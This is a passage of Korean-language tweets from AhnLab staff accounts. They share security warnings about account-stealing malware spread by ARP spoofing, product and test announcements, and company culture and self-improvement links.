발생한 것으로 확인되었습니다. 해당증상이 발생하신

분들은 V3 Lite로 검사해주세요 http://ow.ly/1qPpQJ

AhnLab_man

온라인게임 계정을 탈취하는 악성코드가 일부 웹사이트

를 통해 확산 중! ARP스푸핑으로 동일 네트워크에 전염

되므로 개인/기업의 각별한 주의가 필요합니다. V3제품

군 업데이트/윈도우보안패치 필수! http://ow.ly/2AhU1

AhnLab_man

안랩에서 옷좀 입는다는 사람들이 모여서 월드컵을 한

번 해봤습니다 :) 여러분도 심사위원이 되어 보세요

:) 직장인 패션, 업무 성과도 돋보이는 코디법 http://

ow.ly/2BsZW 본 경기보다 재밌는 응원전까지!

AhnLab_man

저희 V3 Internet Security 8.0 이 이번 8월 윈도우즈

비스타 SP2 비즈니스 에디션 환경에서 VB 100 테스트

를 통과 했습니다~ :)국산엔진의 우수성을 보여준것 같

아 더 좋습니다 http://ow.ly/i/38DY

27

AhnLab's

hongsunkim

"안철수연구소, 첨단생산라인 및 POS 전용 보안솔루션

TrusLine 출시" http://bit.ly/aB5m7h #krsec

AhnLab_man

리더와 관리자의 차이를 여러분은 아시나요? 안철수박

사가 말하는 그 차이: http://ow.ly/2AUWi

hongsunkim

[가트너] 경제불황과 과다경쟁으로 IT 서비스의 가격하

락과 시장 감소. 저비용 IT (매니지드 서비스)가 증가하

고, 쓰는 만큼 지불하는 클라우드 확산 RT @Gartner_

inc: http://bit.ly/9FdBDU

hongsunkim

오랫만에 블로그 하나 올렸습니다. "수도꼭지와 스마트

폰 숫자 급증의 의미는?" http://bit.ly/bnRv02 Consumer

화, IT 빅뱅 등 우리 주위에서 벌어지고 있는 변화를 가

볍게 생각해 봤습니다.

AhnLab_man

평소에는 잘 말을 하다가도 직장이나 많은 사람앞에선

잘 안되시나요? 김미경 아트스피치 원장이 말하는 직장

에서 카리스마 있게 말하기! http://ow.ly/2zWcd

AhnLab_man

라스베이거스에서 열린 세계 최대의 해커 컨퍼러스 데

프콘, 올해도 어김없이 한국의 위상을 드높였습니다.

발표를 맡은 하동주연구원이 쓴 데프콘 후기! http://

ow.ly/2Ekyk

hongsunkim

"추석도 없이 사이버 세상지키는 아름다운 이들" http://

bit.ly/bsHAel 안철수연구소의 CERT팀(침해사고대응센터)

이야기. CERT와 ASEC(악성코드분석센터)을 동시에 보

유한것이 안랩의 자랑입니다.

AhnLab_man

'육일약국 갑시다'의 저자인 메가스터디 엠베스트 김성

오 대표의 강연 요약입니다. 모두가 경영인이라는 말씀

이 무척 와 닿네요 http://ow.ly/2J4Xo

Date post:	10-Oct-2020
Category:	Documents
Upload:	others
View:	0 times
Download:	0 times